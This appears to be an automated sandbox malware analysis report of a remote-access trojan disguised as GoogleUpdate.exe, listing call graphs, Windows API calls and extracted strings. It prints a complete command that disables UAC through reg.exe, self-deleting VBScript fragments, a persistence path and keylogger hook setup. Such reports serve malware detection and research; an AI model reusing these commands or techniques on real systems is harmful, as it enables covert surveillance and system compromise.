                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                                • API String ID: 551388010-2474455403
                                • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                                • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 466 413980-4139c8 call 4020bf call 419894 call 4020bf call 401e45 call 401f8b call 439867 479 4139d7-413a23 call 402073 call 401e45 call 4020d6 call 419d87 call 40487e call 401e45 call 40fbab 466->479 480 4139ca-4139d1 Sleep 466->480 495 413a25-413a94 call 401e45 call 40245c call 401e45 call 401f8b call 401e45 call 40245c call 401e45 call 401f8b call 401e45 call 40245c call 401e45 call 401f8b call 40471d 479->495 496 413a97-413b32 call 402073 call 401e45 call 4020d6 call 419d87 call 401e45 * 2 call 40822a call 402ef0 call 401fc2 call 401fb8 * 2 call 401e45 call 405ae5 479->496 480->479 495->496 549 413b42-413b49 496->549 550 413b34-413b40 496->550 551 413b4e-413be0 call 405a86 call 4052fe call 408209 call 402ef0 call 402073 call 4194da call 401fb8 * 2 call 401e45 call 401f8b call 401e45 call 401f8b call 41393f 549->551 550->551 578 413be2-413bed WSAGetLastError call 41a86b 551->578 579 413c2b-413c39 call 40480d 551->579 583 413bf2-413c26 call 4052dd call 402073 call 4194da call 401fb8 578->583 584 413c66-413c7b call 404f31 call 4048a8 579->584 585 413c3b-413c61 call 402073 * 2 call 4194da 579->585 601 414493-4144a5 call 404e06 call 4021da 583->601 600 413c81-413dd4 call 401e45 * 2 call 4052fe call 408209 call 402ef0 call 408209 call 402ef0 call 402073 call 4194da call 401fb8 * 4 call 4197c1 call 413013 call 408098 call 43f34f call 401e45 call 4020d6 call 40245c call 401f8b * 2 call 4120e8 584->600 584->601 585->601 666 413dd6-413de3 call 405a86 600->666 667 413de8-413e0f call 401f8b call 411f91 600->667 615 4144a7-4144c7 call 401e45 call 401f8b call 439867 Sleep 601->615 616 4144cd-4144d5 call 401e6d 601->616 615->616 616->496 666->667 673 413e11-413e13 667->673 674 413e16-4143fa call 40415e call 419c8a call 419b16 call 401e45 GetTickCount call 419b16 call 419ac6 call 419b16 call 419a77 call 419c8a * 5 call 40e2bb call 419c8a call 402f11 call 402e81 call 402ef0 call 402e81 call 402ef0 * 3 call 402e81 call 402ef0 call 408209 call 402ef0 call 408209 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 40826c call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 408209 call 402ef0 * 5 call 402e81 call 402ef0 call 402e81 call 402ef0 * 6 call 404a81 call 401fb8 * 48 call 401ee9 call 401fb8 * 4 call 401ee9 call 404bf0 667->674 673->674 901 4143ff-414406 674->901 902 414408-41440f 901->902 903 41441a-414421 901->903 902->903 904 414411-414413 902->904 905 414423-414428 call 409f9a 903->905 906 41442d-41445f call 405a4b call 402073 * 2 call 4194da 903->906 904->903 905->906 917 414461-41446d CreateThread 906->917 918 414473-41448e call 401fb8 * 2 call 401ee9 906->918 917->918 918->601
                                APIs
                                • Sleep.KERNEL32(00000000,00000029,74DF0F10,00471FFC,00000000), ref: 004139D1
                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 00413BE2
                                • Sleep.KERNEL32(00000000,00000002), ref: 004144C7
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$ErrorLastLocalTime
                                • String ID: | $%I64u$0gj$3.8.0 Pro$Attempt-S4A0CI$C:\ProgramData\GoogleDat\GoogleUpdate.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$H"G$P0F$TLS Off$TLS On $`"G$hlight$name
                                • API String ID: 524882891-1634896758
                                • Opcode ID: 272676ed62c4a422cbf887dd148861ebdac9e0642bbe42505efa71915bb19c24
                                • Instruction ID: 5f58eceae2704c6c0e376aa481a0c6a7ef3cc820e2c63ea8d389b44db61c6c97
                                • Opcode Fuzzy Hash: 272676ed62c4a422cbf887dd148861ebdac9e0642bbe42505efa71915bb19c24
                                • Instruction Fuzzy Hash: 9F42AE31A001055BCB18F765DDA6AEEB3699F90308F1041BFF40A721E2EF785F868A5D

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 925 40b871-40b88f call 439891 928 40b891-40b8b4 call 401ee4 CreateDirectoryW call 4081c7 925->928 929 40b8e2-40b905 call 40c5ed call 401ef3 925->929 937 40b8b9-40b8e0 call 402ff4 call 401ef3 call 401ee9 928->937 938 40b909-40b925 call 401ee9 call 401ee4 call 439f5d 929->938 937->938 951 40b941-40b956 call 401ee4 CopyFileW 938->951 952 40b927-40b93c call 401ee4 call 40b77f 938->952 957 40b9f5-40ba10 call 401ee4 call 40b77f 951->957 958 40b95c-40b961 951->958 963 40bc4e-40bc58 952->963 971 40ba12-40ba2d call 401ee4 SetFileAttributesW call 439891 957->971 972 40ba3e-40ba96 call 439e5f call 40415e call 402ff4 call 401ee9 call 40415e call 40808e 957->972 958->957 962 40b967-40b977 call 439891 958->962 969 40b9b9-40b9c2 call 40c5ed call 401ef3 962->969 970 40b979-40b9b7 call 40c5ed call 402ff4 * 2 call 401ef3 call 401ee9 * 2 962->970 985 40b9c7-40b9e4 call 401ee9 call 401ee4 CopyFileW 969->985 970->985 971->972 992 40ba2f-40ba3c call 401ee4 SetFileAttributesW 971->992 1015 40bb46-40bc10 call 40415e * 2 call 4042fd call 402f85 call 402ff4 call 40323d call 401ee9 * 5 call 40808e call 401ee4 call 40245c call 401ee4 call 41a17b 972->1015 1016 40ba9c-40bb41 call 40415e * 2 call 402ff4 call 402f85 call 402ff4 * 2 call 40323d call 401ee9 * 6 972->1016 985->957 1005 40b9e6-40b9f0 call 408093 985->1005 992->972 1005->963 1074 40bc12-40bc33 call 401ee4 ShellExecuteW 1015->1074 1075 40bc3c-40bc49 call 401ee9 * 2 1015->1075 1016->1015 1074->1075 1080 40bc35-40bc36 ExitProcess 1074->1080 1075->963
                                APIs
                                • _wcslen.LIBCMT ref: 0040B882
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                                • CopyFileW.KERNEL32(C:\ProgramData\GoogleDat\GoogleUpdate.exe,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                                • _wcslen.LIBCMT ref: 0040B968
                                • CopyFileW.KERNEL32(C:\ProgramData\GoogleDat\GoogleUpdate.exe,00000000,00000000,00000000), ref: 0040B9E0
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                                • _wcslen.LIBCMT ref: 0040BA25
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                                • ExitProcess.KERNEL32 ref: 0040BC36
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                • String ID: """, 0$$.F$0gj$6$C:\ProgramData\GoogleDat\GoogleUpdate.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$t<F
                                • API String ID: 2743683619-732854040
                                • Opcode ID: 3a838ee5c97b6ce66455d5266be73dab1649055cc2c5860905860c34101a79b9
                                • Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
                                • Opcode Fuzzy Hash: 3a838ee5c97b6ce66455d5266be73dab1649055cc2c5860905860c34101a79b9
                                • Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E

                                Control-flow Graph

                                APIs
                                • __Init_thread_footer.LIBCMT ref: 00409C81
                                • Sleep.KERNEL32(000001F4), ref: 00409C8C
                                • GetForegroundWindow.USER32 ref: 00409C92
                                • GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
                                • Sleep.KERNEL32(000003E8), ref: 00409D9D
                                  • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                • String ID: [${ User has been idle for $ minutes }$]
                                • API String ID: 911427763-3954389425
                                • Opcode ID: 19a43bdacbb328f3271daa1859423f0074a75d4c81a0c0d14bd138b107996052
                                • Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
                                • Opcode Fuzzy Hash: 19a43bdacbb328f3271daa1859423f0074a75d4c81a0c0d14bd138b107996052
                                • Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1296 40c5ed-40c612 call 401f66 1299 40c618 1296->1299 1300 40c73c-40c762 call 401ee4 GetLongPathNameW call 40415e 1296->1300 1302 40c711-40c716 1299->1302 1303 40c654-40c659 1299->1303 1304 40c727 1299->1304 1305 40c718-40c725 call 439e5f 1299->1305 1306 40c629-40c637 call 41959f call 401ef3 1299->1306 1307 40c64a-40c64f 1299->1307 1308 40c70a-40c70f 1299->1308 1309 40c65e-40c665 call 419f23 1299->1309 1310 40c61f-40c624 1299->1310 1321 40c767-40c7d4 call 40415e call 40c7f9 call 402f85 * 2 call 401ee9 * 5 1300->1321 1312 40c72c-40c731 call 439e5f 1302->1312 1303->1312 1304->1312 1305->1304 1324 40c732-40c737 call 408093 1305->1324 1330 40c63c 1306->1330 1307->1312 1308->1312 1322 40c667-40c6b7 call 40415e call 439e5f call 40415e call 402f85 call 401ef3 call 401ee9 * 2 1309->1322 1323 40c6b9-40c705 call 40415e call 439e5f call 40415e call 402f85 call 401ef3 call 401ee9 * 2 1309->1323 1310->1312 1312->1324 1335 40c640-40c645 call 401ee9 1322->1335 1323->1330 1324->1300 1330->1335 1335->1300
                                APIs
                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040C753
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: LongNamePath
                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                • API String ID: 82841172-425784914
                                • Opcode ID: 9bca3063e7748e5d89d1a68f7bdf515c31fa044ed2c65757ea3bf61848a421f7
                                • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
                                • Opcode Fuzzy Hash: 9bca3063e7748e5d89d1a68f7bdf515c31fa044ed2c65757ea3bf61848a421f7
                                • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F

                                Control-flow Graph

                                APIs
                                • Sleep.KERNEL32(00001388), ref: 00409738
                                  • Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                  • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                  • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                  • Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
                                • GetFileAttributesW.KERNEL32(00000000), ref: 00409785
                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                                  • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,?,00000000,00000000,00000000,00000000,00000000), ref: 0040991F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                • String ID: 88i$H"G$H"G
                                • API String ID: 3795512280-3329683282
                                • Opcode ID: f33fbd7251cf8f422bdd2e6f674448c5445aa46a64e6695c80c10c4b7cfcd9c5
                                • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
                                • Opcode Fuzzy Hash: f33fbd7251cf8f422bdd2e6f674448c5445aa46a64e6695c80c10c4b7cfcd9c5
                                • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1476 4048a8-4048c8 1478 4049fb-4049ff 1476->1478 1479 4048ce-4048d1 1476->1479 1482 404a01-404a0f 1478->1482 1483 404a77 1478->1483 1480 4049f7-4049f9 1479->1480 1481 4048d7-4048da 1479->1481 1484 404a79-404a7e 1480->1484 1485 404906-404910 call 41ea15 1481->1485 1486 4048dc-404903 call 4052fe call 402073 call 4194da 1481->1486 1482->1483 1491 404a11-404a14 1482->1491 1483->1484 1493 404921-40492e call 41ec44 1485->1493 1494 404912-40491c 1485->1494 1486->1485 1496 404a51-404a56 1491->1496 1497 404a16-404a4f call 41a86b call 4052dd call 402073 call 4194da call 401fb8 1491->1497 1507 404930-404953 call 402073 * 2 call 4194da 1493->1507 1508 404967-404972 call 41f7f5 1493->1508 1498 404a5b-404a74 call 402073 * 2 call 4194da 1494->1498 1496->1498 1497->1483 1498->1483 1540 404956-404962 call 41ea55 1507->1540 1519 4049a4-4049b1 call 41ebbb 1508->1519 1520 404974-4049a2 call 402073 * 2 call 4194da call 41ee67 1508->1520 1536 4049b3-4049d6 call 402073 * 2 call 4194da 1519->1536 1537 4049d9-4049f4 CreateEventW 1519->1537 1520->1540 1536->1537 1537->1480 1540->1483
                                APIs
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateEventLocalTime
                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                • API String ID: 2082726707-2151626615
                                • Opcode ID: 61d33b4e7b12f4ff2c35ec2f77fa078576cbad09f03d7b01a313875f432ed892
                                • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
                                • Opcode Fuzzy Hash: 61d33b4e7b12f4ff2c35ec2f77fa078576cbad09f03d7b01a313875f432ed892
                                • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1554 409340-409357 1555 409359-409373 GetModuleHandleA SetWindowsHookExA 1554->1555 1556 4093bb-4093cb GetMessageA 1554->1556 1555->1556 1559 409375-4093b9 GetLastError call 419b16 call 4052dd call 402073 call 4194da call 401fb8 1555->1559 1557 4093e7 1556->1557 1558 4093cd-4093e5 TranslateMessage DispatchMessageA 1556->1558 1560 4093e9-4093ee 1557->1560 1558->1556 1558->1557 1559->1560
                                APIs
                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
                                • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
                                • GetLastError.KERNEL32 ref: 00409375
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
                                • TranslateMessage.USER32(?), ref: 004093D2
                                • DispatchMessageA.USER32(?), ref: 004093DD
                                Strings
                                • Keylogger initialization failure: error , xrefs: 00409389
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                • String ID: Keylogger initialization failure: error
                                • API String ID: 3219506041-952744263
                                • Opcode ID: cfd85c535bb0db94fb89dc6c4df829e687b8f2a6419d7d210f0f2ce5eeb3337a
                                • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
                                • Opcode Fuzzy Hash: cfd85c535bb0db94fb89dc6c4df829e687b8f2a6419d7d210f0f2ce5eeb3337a
                                • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1618 4192ae-419305 call 419f23 call 411f91 call 401fc2 call 401fb8 call 4060ea 1629 419307-419316 call 411f91 1618->1629 1630 419348-419351 1618->1630 1635 41931b-419332 call 401f8b StrToIntA 1629->1635 1631 419353-419358 1630->1631 1632 41935a 1630->1632 1634 41935f-41936a call 40535d 1631->1634 1632->1634 1640 419340-419343 call 401fb8 1635->1640 1641 419334-41933d call 41accf 1635->1641 1640->1630 1641->1640
                                APIs
                                  • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,00410C6A), ref: 00419F34
                                  • Part of subcall function 00419F23: IsWow64Process.KERNEL32(00000000,?,?,00410C6A), ref: 00419F3B
                                  • Part of subcall function 00411F91: RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                  • Part of subcall function 00411F91: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                  • Part of subcall function 00411F91: RegCloseKey.KERNEL32(?), ref: 00411FDD
                                • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 782494840-2070987746
                                • Opcode ID: 5d6f7caedd091060e040371a73527f4b0984226e085eb11b2fed307dbaea5501
                                • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
                                • Opcode Fuzzy Hash: 5d6f7caedd091060e040371a73527f4b0984226e085eb11b2fed307dbaea5501
                                • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA

                                Control-flow Graph

                                APIs
                                • GetForegroundWindow.USER32(00472008,?,00472008), ref: 0040949C
                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                • GetKeyState.USER32(00000010), ref: 004094B8
                                • GetKeyboardState.USER32(?), ref: 004094C5
                                • ToUnicodeEx.USER32(0000005B,0000005B,?,?,00000010,00000000,00000000), ref: 004094E1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                • String ID:
                                • API String ID: 3566172867-0
                                • Opcode ID: fb31a49d7b713d020a20d08ecca38714848a3f936d0bc64d24338e42dde13448
                                • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
                                • Opcode Fuzzy Hash: fb31a49d7b713d020a20d08ecca38714848a3f936d0bc64d24338e42dde13448
                                • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1650 40e501-40e562 call 434c30 * 2 CreateProcessA CloseHandle * 2
                                APIs
                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
                                Strings
                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
                                • C:\Windows\System32\cmd.exe, xrefs: 0040E542
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreateProcess
                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                • API String ID: 2922976086-4183131282
